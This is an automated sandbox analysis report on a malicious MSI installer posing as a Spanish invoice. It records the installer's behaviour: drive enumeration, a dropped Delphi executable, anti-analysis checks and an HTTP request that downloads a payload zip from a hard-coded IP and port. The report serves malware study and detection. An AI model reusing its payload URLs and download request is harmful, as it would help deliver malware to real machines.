Analysis Report SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 188715
Start date: 09.11.2019
Start time: 10:47:21
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 28s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal52.troj.winMSI@3/3@0/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .msi
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, CompatTelRunner.exe
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy | Score | Range | Reporting | Whitelisted | Detection
Threshold | 52 | 0 - 100 | | false | malicious

Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false |


Classification

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons; more UI automation would likely extend the observed behavior
Sample is looking for USB drives. Launch the sample with the USB Fake Disk cookbook
Sample tries to load a library which is not present or installed on the analysis machine; adding the library might reveal more behavior



Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control
Replication Through Removable Media 1 | Windows Remote Management | Winlogon Helper DLL | Process Injection 1 | Process Injection 1 | Credential Dumping | Process Discovery 1 | Replication Through Removable Media 1 | Data from Local System | Data Compressed | Uncommonly Used Port 11
Replication Through Removable Media | Service Execution | Port Monitors | Accessibility Features | DLL Side-Loading 1 | Network Sniffing | Peripheral Device Discovery 11 | Remote File Copy 1 | Data from Removable Media | Exfiltration Over Other Network Medium | Standard Non-Application Layer Protocol 1
Drive-by Compromise | Windows Management Instrumentation | Accessibility Features | Path Interception | Rootkit | Input Capture | Security Software Discovery 11 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Standard Application Layer Protocol 11
Exploit Public-Facing Application | Scheduled Task | System Firmware | DLL Search Order Hijacking | Obfuscated Files or Information | Credentials in Files | File and Directory Discovery 1 | Logon Scripts | Input Capture | Data Encrypted | Remote File Copy 1
Spearphishing Link | Command-Line Interface | Shortcut Modification | File System Permissions Weakness | Masquerading | Account Manipulation | System Information Discovery 2 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Cryptographic Protocol

Signature Overview



AV Detection:

Antivirus or Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\reabns\ERICCLAPTONROX.exe | Joe Sandbox ML: detected

Spreading:

Checks for available system drives (often done to infect USB drives)
Source: C:\Windows\System32\msiexec.exe | File opened: z:
Source: C:\Windows\System32\msiexec.exe | File opened: x:
Source: C:\Windows\System32\msiexec.exe | File opened: v:
Source: C:\Windows\System32\msiexec.exe | File opened: t:
Source: C:\Windows\System32\msiexec.exe | File opened: r:
Source: C:\Windows\System32\msiexec.exe | File opened: p:
Source: C:\Windows\System32\msiexec.exe | File opened: n:
Source: C:\Windows\System32\msiexec.exe | File opened: l:
Source: C:\Windows\System32\msiexec.exe | File opened: j:
Source: C:\Windows\System32\msiexec.exe | File opened: h:
Source: C:\Windows\System32\msiexec.exe | File opened: f:
Source: C:\Windows\System32\msiexec.exe | File opened: b:
Source: C:\Windows\System32\msiexec.exe | File opened: y:
Source: C:\Windows\System32\msiexec.exe | File opened: w:
Source: C:\Windows\System32\msiexec.exe | File opened: u:
Source: C:\Windows\System32\msiexec.exe | File opened: s:
Source: C:\Windows\System32\msiexec.exe | File opened: q:
Source: C:\Windows\System32\msiexec.exe | File opened: o:
Source: C:\Windows\System32\msiexec.exe | File opened: m:
Source: C:\Windows\System32\msiexec.exe | File opened: k:
Source: C:\Windows\System32\msiexec.exe | File opened: i:
Source: C:\Windows\System32\msiexec.exe | File opened: g:
Source: C:\Windows\System32\msiexec.exe | File opened: e:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: c:
Source: C:\Windows\System32\msiexec.exe | File opened: a:

Networking:

Uses known network protocols on non-standard ports
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 4748
Source: unknown | Network traffic detected: HTTP traffic on port 4748 -> 49739
Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.2.6:49739 -> 35.247.208.129:4748
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected:
  GET /ecjay.zip HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 35.247.208.129:4748
  Connection: Keep-Alive
Connects to IPs without corresponding DNS lookups
Source: unknown | TCP traffic detected without corresponding DNS query: 35.247.208.129
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected:
  GET /ecjay.zip HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 35.247.208.129:4748
  Connection: Keep-Alive
Found strings which match known social media URLs
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi | String found in binary or memory: INSERT INTO `` (`Property`, `Order`, `Value`, `Text`) VALUES (?,?,?,?) TEMPORARYComboBoxListBoxSELECT * FROM `%s` WHERE `Property`='%s' AND `Value`='%s'SELECT * FROM `%s` WHERE `Property`='%s'DELETE FROM `%s` WHERE `Property`='%s' [1]SELECT `Message` FROM `Error` WHERE `Error` = %sSELECT `Text` FROM `UIText` WHERE `Key` = '%s'tmpALLUSERS = 1';WS_EX_LAYOUTRTLWS_EX_NOINHERITLAYOUTWS_EX_NOACTIVATEWS_EX_LAYEREDWS_EX_RIGHTWS_EX_RIGHTSCROLLBARWS_EX_WINDOWEDGEWS_EX_TRANSPARENTWS_EX_TOPMOSTWS_EX_TOOLWINDOWWS_EX_STATICEDGEWS_EX_RTLREADINGWS_EX_PALETTEWINDOWWS_EX_OVERLAPPEDWINDOWWS_EX_NOPARENTNOTIFYWS_EX_MDICHILDWS_EX_LTRREADINGWS_EX_LEFTSCROLLBARWS_EX_LEFTWS_EX_DLGMODALFRAMEWS_EX_CONTROLPARENTWS_EX_CONTEXTHELPWS_EX_CLIENTEDGEWS_EX_APPWINDOWWS_EX_ACCEPTFILESWS_TILEDWS_TILEDWINDOWWS_POPUPWS_POPUPWINDOWWS_OVERLAPPEDWS_OVERLAPPEDWINDOWWS_MINIMIZEWS_MINIMIZEBOXWS_MAXIMIZEWS_MAXIMIZEBOXWS_VSCROLLWS_VISIBLEWS_THICKFRAMEWS_TABSTOPWS_SYSMENUWS_SIZEBOXWS_ICONICWS_HSCROLLWS_GROUPWS_DLGFRAMEWS_DISABLEDWS_CLIPSIBLINGSWS_CLIPCHILDRE
URLs found in memory or binary data
Source: SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi | String found in binary or memory: http://35.247.208.129:4748/ecjay.zip
Source: msiexec.exe, 00000002.00000002.4957846964.00000000000CA000.00000004.00000020.sdmp | String found in binary or memory: http://35.247.208.129:4748/ecjay.zipy
Source: SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi | String found in binary or memory: http://bucatinni.com.br/ad/spain/index.php
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi | String found in binary or memory: http://ocsp.thawte.com0
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi | String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi | String found in binary or memory: http://t2.symcb.com0
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi | String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi | String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi | String found in binary or memory: http://tl.symcd.com0&
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi | String found in binary or memory: http://www.advancedinstaller.com0
Source: SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi | String found in binary or memory: http://www.componentace.com
Source: msiexec.exe, 00000002.00000002.4958114175.0000000000106000.00000004.00000020.sdmp | String found in binary or memory: https://login.live.com
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi | String found in binary or memory: https://www.thawte.com/cps0/
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi | String found in binary or memory: https://www.thawte.com/repository0

System Summary:

PE file contains strange resources
Source: ERICCLAPTONROX.exe.2.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ERICCLAPTONROX.exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file name is different from the original file name gathered from version info
Source: SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi | Binary or memory string: OriginalFileName vs SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi
Source: SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi | Binary or memory string: OriginalFilenameAICustAct.dllF vs SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi
Tries to load missing DLLs
Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Binary contains device paths (device paths are often used for kernel mode <-> user mode communication)
Source: SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi | Binary string: IDYESAI_OFFICE_REGOPENAI_ADDIN0.0.0.0Advanced Installer PathSoftware\Caphyon\Advanced Installer\Installation PathSoftware\Caphyon\Advanced InstallerAI_OFN_FILEPATHAI_OFN_DLG_TITLEAI_OFN_FILTERSAI_OFN_FLAGSAI_OFN_DEF_EXTAI_OFN_DIRECTORYAI_OFN_FILENAMEAI_MINJREVERSIONAI_PACKAGE_TYPEx64Intel64Software\JavaSoft\Java Runtime Environment\AI_JREVERFOUNDAI_MINJDKVERSIONSoftware\JavaSoft\Java Development Kit\AI_JDKVERFOUNDAI_COMBOBOX_DATAAI_LISTBOX_DATA\\\esc1\#\esc2\|\esc3\\esc0\esc0\\esc2#\esc3|\esc1\ERROR%sERROR_NO_VALUEERROR_DUPLICATE_ITEM%s: %sSUCCESS#\#|\|\\\%s%c%s%c%s%s%c%sSELECT * FROM `Control` WHERE `Type` = 'Bitmap'AI_SYSTEM_DPIAI_SYSTEM_DPI_SCALEAI_BITMAP_DISPLAY_MODESELECT `Argument`, `Condition` FROM `ControlEvent` WHERE `Dialog_` = 'ExitDialog' AND `Control_` = 'Finish' AND `Event` = 'DoAction' ORDER BY `Ordering`AI_AI_ViewReadmeAI_LaunchAppCTRLS3ALLSELECT `Feature` FROM `Feature`DoActionAddLocalRemoveAddSourceReinstallModeREINSTALLMODEAI_INSTALL_MODE{ED4824AF-DCE4-45A8-81E2-FC7965083634}PublicDocumentsF
Classification label
Source: classification engine | Classification label: mal52.troj.winMSI@3/3@0/1
Creates files inside the user directory
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\reabns
Detected Delphi use of System.ParamCount()
Source: Yara match | File source: 00000005.00000000.4602476218.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\reabns\ERICCLAPTONROX.exe, type: DROPPED
Parts of this application are using Borland Delphi (probably coded in Delphi)
Source: C:\Windows\SysWOW64\msiexec.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\msiexec.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi
Reads ini files
Source: C:\Windows\SysWOW64\msiexec.exe | File read: C:\Users\user\Desktop\desktop.ini
Reads software policies
Source: C:\Windows\System32\msiexec.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
SQL strings found in memory and binary data
Source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp | Binary or memory string: INSERT INTO `` (`Property`, `Order`, `Value`, `Text`) VALUES (?,?,?,?) TEMPORARYComboBoxListBoxSELECT * FROM `%s` WHERE `Property`='%s' AND `Value`='%s'SELECT * FROM `%s` WHERE `Property`='%s'DELETE FROM `%s` WHERE `Property`='%s' [1]SELECT `Message` FROM `Error` WHERE `Error` = %sSELECT `Text` FROM `UIText` WHERE `Key` = '%s'tmpALLUSERS = 1';WS_EX_LAYOUTRTLWS_EX_NOINHERITLAYOUTWS_EX_NOACTIVATEWS_EX_LAYEREDWS_EX_RIGHTWS_EX_RIGHTSCROLLBARWS_EX_WINDOWEDGEWS_EX_TRANSPARENTWS_EX_TOPMOSTWS_EX_TOOLWINDOWWS_EX_STATICEDGEWS_EX_RTLREADINGWS_EX_PALETTEWINDOWWS_EX_OVERLAPPEDWINDOWWS_EX_NOPARENTNOTIFYWS_EX_MDICHILDWS_EX_LTRREADINGWS_EX_LEFTSCROLLBARWS_EX_LEFTWS_EX_DLGMODALFRAMEWS_EX_CONTROLPARENTWS_EX_CONTEXTHELPWS_EX_CLIENTEDGEWS_EX_APPWINDOWWS_EX_ACCEPTFILESWS_TILEDWS_TILEDWINDOWWS_POPUPWS_POPUPWINDOWWS_OVERLAPPEDWS_OVERLAPPEDWINDOWWS_MINIMIZEWS_MINIMIZEBOXWS_MAXIMIZEWS_MAXIMIZEBOXWS_VSCROLLWS_VISIBLEWS_THICKFRAMEWS_TABSTOPWS_SYSMENUWS_SIZEBOXWS_ICONICWS_HSCROLLWS_GROUPWS_DLGFRAMEWS_DISABLEDWS_CLIPSIBLINGSWS_CLIPCHILDRE
Spawns processes
Source: unknown | Process created: C:\Windows\System32\msiexec.exe 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi'
Source: unknown | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 4E216DC0A05EC098F1073D3938A185A0
Source: unknown | Process created: C:\Users\user\AppData\Local\reabns\folatacemava.exe unknown
Uses an in-process (OLE) Automation server
Source: C:\Windows\System32\msiexec.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32
Submission file is bigger than most known malware samples
Source: SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi | Static file information: File size 1800704 > 1048576
Binary contains paths to debug symbols
Source: Binary string: C:\Branch\win\Release\custact\x86\AICustAct.pdb | source: msiexec.exe, 00000000.00000002.4921771101.000001ED88900000.00000002.00000001.sdmp, SpainFacturaEUR_44319002493222633226332323DSS2293DS29182DS8.msi

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\reabns\ERICCLAPTONROX.exe

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 4748
Source: unknown | Network traffic detected: HTTP traffic on port 4748 -> 49739
Disables application error messages (SetErrorMode)
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Checks the free space of hard drives
Source: C:\Windows\System32\msiexec.exe | File Volume queried: C:\ FullSizeInformation
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: msiexec.exe, 00000002.00000002.4958114175.0000000000106000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAWn
Source: msiexec.exe, 00000002.00000002.4958114175.0000000000106000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 00000002.00000002.4958114175.0000000000106000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAWpX

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\SysWOW64\msiexec.exe | System information queried: KernelDebuggerInformation

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)
Source: msiexec.exe, 00000000.00000002.4914584728.000001ED861C0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: msiexec.exe, 00000000.00000002.4914584728.000001ED861C0000.00000002.00000001.sdmp, folatacemava.exe, 00000005.00000000.4602476218.0000000000401000.00000020.00020000.sdmp, ERICCLAPTONROX.exe.2.dr | Binary or memory string: Shell_TrayWnd
Source: msiexec.exe, 00000000.00000002.4914584728.000001ED861C0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: msiexec.exe, 00000000.00000002.4914584728.000001ED861C0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: folatacemava.exe, 00000005.00000000.4602476218.0000000000401000.00000020.00020000.sdmp, ERICCLAPTONROX.exe.2.dr | Binary or memory string: Shell_TrayWndS
Source: folatacemava.exe, 00000005.00000000.4602476218.0000000000401000.00000020.00020000.sdmp, ERICCLAPTONROX.exe.2.dr | Binary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32SV

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc.) of a device
Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation

Behavior Graph


Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Simulations

Behavior and APIs

Time | Type | Description
10:49:07 | API Interceptor | 2x Sleep call for process: msiexec.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\reabns\ERICCLAPTONROX.exe | 100% | Joe Sandbox ML |

Unpacked PE Files

Source | Detection | Scanner | Label
2.2.msiexec.exe.47c0000.3.unpack | 100% | Avira | HEUR/AGEN.1037241

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://bucatinni.com.br/ad/spain/index.php | 0% | Avira URL Cloud | safe
http://35.247.208.129:4748/ecjay.zipy | 0% | Avira URL Cloud | safe
http://35.247.208.129:4748/ecjay.zip | 4% | Virustotal |
http://35.247.208.129:4748/ecjay.zip | 0% | Avira URL Cloud | safe
http://ocsp.thawte.com0 | 0% | URL Reputation | safe
http://www.advancedinstaller.com0 | 0% | Avira URL Cloud | safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

Source | Rule | Description | Author
C:\Users\user\AppData\Local\reabns\ERICCLAPTONROX.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security

Memory Dumps

Source | Rule | Description | Author
00000005.00000000.4602476218.0000000000401000.00000020.00020000.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security

Unpacked PEs

No yara matches

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Context

JA3 Fingerprints

No context

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.